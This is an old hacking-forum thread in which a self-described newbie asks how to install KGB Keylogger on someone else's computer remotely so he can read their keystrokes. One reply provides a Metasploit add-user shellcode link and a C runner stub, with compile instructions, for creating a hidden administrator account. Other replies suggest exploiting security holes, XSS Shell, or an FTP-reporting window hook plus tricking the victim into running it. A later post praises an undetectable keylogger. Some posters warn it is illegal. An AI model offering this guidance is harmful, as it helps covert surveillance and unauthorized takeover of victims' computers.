KGB Keylogger

A place where newbies can post without (much) fear of reprisal. All mission posts should still go in the applicable forum.
Forum rules
Older HTS users: Be nice to the new people.

NEW USERS: This is NOT the place to post about missions! Refer to "Missions" category.

KGB Keylogger

Post by NewLearner on Wed Jun 17, 2009 8:02 pm
([msg=25497]see KGB Keylogger[/msg])

So ummm for everyone that doesn't know. KGB is a system that can record any keys typed under any user on a certain computer. It does much more than this by recording screenshots, clicks, websites and a few other things. This is used for security on computers in schools and business' to monitor employees and kids.

Now to my question. I am wondering if anyone out there knows if this particular program can add users that are not on that computer. Meaning can you send this as a file that gets into someone elses computer through i.e a link to a picture or a website. Or would the person have to download something...and this program downloads secretively while also a fake download commences.

I would appreciate this very much if someone could answer this. I am a n00b when it comes to this and just started learning. If this needs to be posted somewhere else please let me know. Thanks very much and have a good day.
NewLearner
New User
New User

Blog: View Blog (0)

Re: KGB Keylogger

Post by Tentra on Wed Jun 17, 2009 8:31 pm
([msg=25501]see Re: KGB Keylogger[/msg])

First off, what does this have to do with a key logger?

Now if I understood your question, you want to be able to add users on a computer. For me shellcode comes to mind.

Metasploit has this nice little shellcode generator:
http://metasploit.com:55555/PAYLOADS?MODE=SELECT&MODULE=win32_adduser

Fill out the form and click generate, then copy the the C code(its the first half that will start with "unsigned char scode[]")

And paste into this
Code: Select all
#include <stdio.h>
#include <string.h>

/*
* PASTE SHELLCODE HERE
*/

int main()
{
   void (*exploit)();
   *(int*)&exploit= scode;
   exploit();
}

Then just compile with some C/C++ compiler.
If you dont have a compiler you can download MinGW here
When you install it check the g++ check box then from your command prompt type:
Code: Select all
PATH=%PATH%;C:\MinGW\bin\
gcc <name of shellcode file>

This will compile into a.exe, which when run will make a new administrator account on the computer.

If that's not what you wanted re-post with a little clearer explanation on what you want done.
Tentra
Poster
Poster

Post by NewLearner on Wed Jun 17, 2009 11:54 pm
([msg=25507]see Re: KGB Keylogger[/msg])

What does it have to do with a key logger? It has to do with hacking someones computer by having my keylogger run secretly on their computer and making it so it transfer onto my program so I can see what they type. So I would say everything revolves around the keylogger. ;)

If you know another way how I can see what others type then please explain. I will try whatever works. Remember I am trying to do it over the internet so I do not have access to their computer nor are they in anyway directly hooked to my network.

EDIT: So basically does anyone know if KGB keylogger can gain access to a computer over the internet and allow me to read what they type?
NewLearner
New User
New User

Post by Tentra on Thu Jun 18, 2009 3:59 pm
([msg=25564]see Re: KGB Keylogger[/msg])

So you just want to install a key logger onto someones computer via the internet? You pretty much have two options. Find a security hole on their computer and exploit it to run malicious code, or if you want to key log their browser you can use XSS Shell.

Also I'm assuming you have one single person in mind you want to attack.

EDIT: So basically does anyone know if KGB keylogger can gain access to a computer over the internet and allow me to read what they type?

Probably Not

-- Thu Jun 18, 2009 3:32 pm --

A quick side note since I know this is a fairly popular topic to most new users I am assuming you are using this knowledge to learn and understand how some attacks are performed on computers. Since you mentioned the software "KGB Keylogger" I'm guessing you heard something about it and are curious and wanting to learn more.

If you want to test anything you learn do it on a computer you have permission.
Tentra
Poster
Poster

Post by haha01haha01 on Thu Jun 18, 2009 5:13 pm
([msg=25570]see Re: KGB Keylogger[/msg])

If you just want to keylog a single person use a simple window hook with FTP, and persuade him into running the file. Not that hard to do...

But let me just warn you that it's illegal and that the hackthissite members will probably not help you with the actual developing.
There are 11 types of people in the world - those who understand binary, those who don't and those who already heard this joke.
haha01haha01
Poster
Poster

Post by Nancycy on Wed Oct 28, 2015 2:36 am
([msg=90332]see Re: KGB Keylogger[/msg])

Is there any free keylogger? I have not found any yet. I was looking for the free keylogger. Now I am using a paid version Micro Keylogger. It's working smoothly with every facility that I need in keylogger - it's undetectable, runs secretly and keeps track every activity by the users, but I don't want to pay so much money for it.
Leave away
Nancycy
New User
New User

Post by Misanthropydotexe on Wed Oct 28, 2015 8:15 am
([msg=90334]see Re: KGB Keylogger[/msg])

Mmmmmmmmmmmmmmmskiddie.
My armor is Contempt. My shield is Disgust. My sword is Hatred.
Respect not pity or weakness, for they are a disease which makes sick the strong
/sbin/poweroff
Misanthropydotexe
Poster
Poster

Post by cyberdrain on Wed Oct 28, 2015 11:59 am
([msg=90335]see Re: KGB Keylogger[/msg])

Well, that's a necro. Create your own, that's free for sure. ;)

Misanthropydotexe wrote:Mmmmmmmmmmmmmmmskiddie.

Basically.
Free your mind / Think clearly
cyberdrain
Expert
Expert

Return to NZone